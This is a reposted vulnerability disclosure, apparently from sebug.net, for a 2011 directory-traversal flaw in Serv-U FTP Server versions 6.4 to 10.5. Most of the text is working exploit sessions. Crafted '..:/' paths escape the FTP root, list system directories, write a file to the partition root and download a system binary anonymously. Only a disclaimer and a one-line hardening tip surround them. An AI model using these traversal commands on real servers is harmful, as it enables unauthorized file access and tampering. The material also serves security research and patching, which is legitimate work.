本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 复制代码代码如下: [*]—————————————————-[*] Serv-U FTP Server Jail Break 0day Discovered By Kingcope Year 2011 [*]—————————————————-[*] /* sebug.net 通过构造..:/来遍历服务器目录,下载任意文件 影响版本:6.4,7.1,7.3,8.2,10.5 */ Affected: 220 Serv-U FTP Server v7.3 ready… 220 Serv-U FTP Server v7.1 ready… 220 Serv-U FTP Server v6.4 ready… 220 Serv-U FTP Server v8.2 ready… 220 Serv-U FTP Server v10.5 ready… [*]—————————————————-[*] C:\\Users\\kingcope\\Desktop>ftp 192.168.133.134 Verbindung mit 192.168.133.134 wurde hergestellt. 220 Serv-U FTP Server v6.4 for WinSock ready… Benutzer (192.168.133.134:(none)): ftp (anonymous user :>) 331 User name okay, please send complete E-mail address as password. Kennwort: 230 User logged in, proceed. ftp> cd \”/..:/..:/..:/..:/program files\” 250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files ftp> ls -la 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. dr–r–r– 1 user group 0 Nov 12 21:48 . dr–r–r– 1 user group 0 Nov 12 21:48 .. drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio n drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources d——— 1 user group 0 Jul 8 16:12 InstallShield Installation Information drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch drw-rw-rw- 1 user group 0 Feb 12 2011 Java drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com drw-rw-rw- 1 user group 0 Feb 12 2011 Sun d——— 1 user group 0 Jul 29 15:13 Uninstall Information drw-rw-rw- 1 user group 0 Feb 5 2011 VMware drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT d——— 1 user group 0 Feb 5 2011 WindowsUpdate 226 Transfer complete. FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s ftp> [*]—————————————————-[*] with write perms: ftp> put foo.txt ..:/..:/..:/foobar <<– writes foo into root of partition [*]—————————————————-[*] and as anonymous ftp: ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes 200 PORT Command successful. 150 Opening ASCII mode data connection for calc.exe (115712 Bytes). 226 Transfer complete. FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s [*]—————————————————-[*] This works to!!! : 220 Serv-U FTP Server v7.3 ready… Benutzer (xx.xx.xx.xx:(none)): ftp 331 User name okay, please send complete E-mail address as password. Kennwort: 230 User logged in, proceed. ftp> ls \”-a ..:\\:..\\..:\\..:\\..:\\..:\\..:\\..:\\..:\\*\” 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. . .. AUTOEXEC.BAT boot.ini bootfont.bin bsmain_runtime.log CONFIG.SYS Documents and Settings FPSE_search Inetpub IO.SYS log MSDOS.SYS msizap.exe MSOCache mysql NTDETECT.COM ntldr Program Files RavBin RECYCLER Replay.log rising.ini System Volume Information TDDOWNLOAD WCH.CN WINDOWS wmpub 226 Transfer complete. 317 bytes transferred. 19.35 KB/sec. FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s [*]—————————————————-[*] Sometimes you need to give it the path: ftp> ls \”-a ..:\\:..\\..:\\..:\\..:\\..:\\..:\\..:\\..:\\program files\\\” ftp> ls \”-a ..:\\:..\\..:\\..:\\..:\\..:\\..:\\..:\\..:\\program files\\*\” 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. . .. 360 Adobe ASP.NET CCProxy CE Remote Tools cmak Common Files ComPlus Applications D-Tools FFTPServer HTML Help Workshop IISServer InstallShield Installation Information Intel Internet Explorer Java JavaSoft K-Lite Codec Pack Microsoft ActiveSync Microsoft Analysis Services Microsoft Device Emulator Microsoft MapPoint Web Service Samples Microsoft MapPoint Web Service SDK, Version 4.0 Microsoft Office Microsoft Office Servers Microsoft Silverlight Microsoft SQL Server Microsoft Visual SourceSafe Microsoft Visual Studio 8 Microsoft.NET MSBuild MSXML 6.0 NetMeeting Outlook Express PortMap1.61 Reference Assemblies Rising SQLXML 4.0 SQLyog Enterprise STS2Setup_2052 Symantec Thunder Network TSingVision Uninstall Information Windows Media Player Windows NT WindowsUpdate WinRAR 226 Transfer complete. 835 bytes transferred. 50.96 KB/sec. FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s ftp> @Sebug.net [ 2011-12-01 ]脚本提供修正方法:通过设置serv_u的权限可以防范此类问题,大家一定要注意serv_u安全设置问题。
